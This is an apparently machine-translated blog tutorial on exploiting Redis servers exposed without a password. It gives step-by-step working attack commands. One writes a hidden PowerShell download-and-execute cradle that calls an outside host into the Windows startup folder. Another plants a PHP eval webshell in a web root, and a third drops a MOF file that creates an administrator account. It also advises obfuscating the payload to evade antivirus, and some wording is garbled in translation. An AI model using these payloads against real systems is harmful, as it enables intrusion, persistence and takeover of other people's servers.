Hardcore resources! Use redis unauthorized access vulnerability (detailed graphic explanation)

The previous article shared "SpringMVC-RequestMappingHandlerMapping", this article shared "
Utilizing Redis Unauthorized Access Vulnerability".

0x00 principle

The first thing you need to know is that redis is a non-relational database. By default, it is bound to 0.0.0.0:6379. If you do not adopt relevant policies, such as adding a firewall to restrict untrusted IP access, the redis service will be exposed to the public network. If password authentication is not set, any user may not be Authorize access to redis and read redis data. The attacker can use the config command provided by redis to write the file, and write his ssh public key into the authenticated_keys of the target server/root/.ssh folder, and then use the private key to directly SSH into the target server.

0x01 vulnerability point

  • Redis is bound to 0.0.0.0:6379, and no firewall rules are added to avoid other untrusted source IP access and other related security policies, which are directly exposed to the public network.
  • Without password authentication (usually empty), you can log in to the redis service remotely without a password.

0x02 hazard

  • Attackers do not need to be authenticated to access internal data, which may lead to the disclosure of sensitive information. Hackers can also maliciously execute fluxhall to clear all data.
  • Attackers can execute Lua code through EVAL, or write backdoor files to disk through the data backup function.
  • In the most serious case, if Redis is running as root, the hacker can write the SSH public key file to the root account and log in to the victim server directly through SSH
  • Direct remote control of the target host

0x03 vulnerability poc

Assume that 192.168.242.134 may have an unauthorized access vulnerability to redis.

Generally scan through the nmap script
  • nmap -p 6379 --script redis-info 192.168.242.134

After scanning, if it is found that port 6379 of the host is developed for external development, it can be considered that there is a redis database. If it happens to be the default configuration with a blank password, and the server is still open on the external network, it can be used in another vps with a redis database./redis- cli -h 192.168.242.134 Connect remotely directly.

View sensitive information

  • redis 192.168.242.134:6379> info

0x04 vulnerability exp

0x04.1 Write startup item

Under Linux, permissions can generally be obtained by setting timed tasks, but now we are discussing the use under windows.
windows startup item directory

C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/

Configure monitoring on cs

Generate payload

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://129.xxx:80/a'))"

Note that if it is a public IP or intranet penetration, the download may not succeed.
If there is anti-virus software, you can try to obfuscate the powershell code to avoid killing.

Configure after connecting redis

config set dir "C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/startup/"
+OK
config set dbfilename 1.bat
+OK
set x "\r\n\r\npowershell.exe -nop -w hidden -c ”IEX ((new-object net.webclient).downloadstring('http://129.xxx:80/a'))”\r\n\r\n”
+OK
save
+ OK

To explain briefly, redis generates 1.bat in the startup item through config set, and then writes our powershell remote download shellcode to execute and save it in the file. As long as the computer restarts, 1.bat will run automatically.

0x04.2 write to webshell

According to the rules summarized above, our way of exploiting redis unauthorized vulnerabilities is generally by writing files, and then establishing a connection between the target machine and us, so if we know the absolute path of the target website, it can be done in a certain directory of the website Write a word of Trojan horse, and then use the webshell management tool to connect.
After connecting to the target redis

192.168.1.103:6379> CONFIG SET dir c:/phpstudy_pro/WWW
OK
192.168.1.103:6379> CONFIG SET dbfilename shell.php
OK
192.168.1.103:6379> set x “php @eval($_POST['hack']) ?>"
OK
192.168.1.103:6379> save
OK

Then connect directly through Ant Sword.

0x04.3 mof right escalation

mof is a file of Windows system, located in c:/windows/system32/wbem/mof/nullevt.mof
is called managed object format. Its role is to monitor the creation and death of processes every 5 seconds. The simple use of mof to raise rights is to write a malicious mof file in the folder, one of which is a vbs script, and most of this vbs script is a cmd command to add an administrator user. After the writing is completed, the file will be executed by the server with system permissions every 5 seconds. (This setting, which is executed once every 5 seconds by default, is only available for systems of 03 and below)

condition

  • win2003 system

mof code

#pragma namespace("\\.\root\subscription") instance of __EventFilter as $EventFilter {EventNamespace = "Root\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent ""Where TargetInstance Isa "Win32_LocalTime" ""And TargetInstance.Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer {Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject("WScript.Shell ")\nWSH.run("net user admin admin /add ")"; }; instance of __FilterToConsumerBinding {Consumer = $Consumer; Filter = $EventFilter; };

Format according to the picture

Save the Mof code as ceshi.txt to
generate a shell.txt and write the contents of ceshi.txt to shell.txt

(echo -e "nn"; cat ceshi.txt; echo -e "nn")> shell.txt

Payload after connecting to redis

Pass the read data of the opened shell.txt to the target redis through the pipeline for writing

  • cat /root/shell.txt | ./redis-cli -h 192.168.1.104 -x set x
    Then set the directory
  • CONFIG SET dir C:/windows/system32/wbem/mof/
  • CONFIG SET dbfilename shell.mof
  • save

Reference drawing configuration

After about 5 seconds, the mof script will be automatically executed. Compared with the two conditions of restarting and knowing the absolute path of the website, this condition is relatively easy to achieve.
After executing the script, it can be found that a new user has been generated under the target host, so we can directly connect remotely.

  • The above is the sharing of "Utilizing Redis Unauthorized Access Vulnerability".
  • Everyone is also welcome to exchange and discuss. If there are any errors in this article, I hope you can forgive me.
  • It is not easy to create, your support is my biggest motivation, if you are helpful to everyone, please give me a thumbs up~~~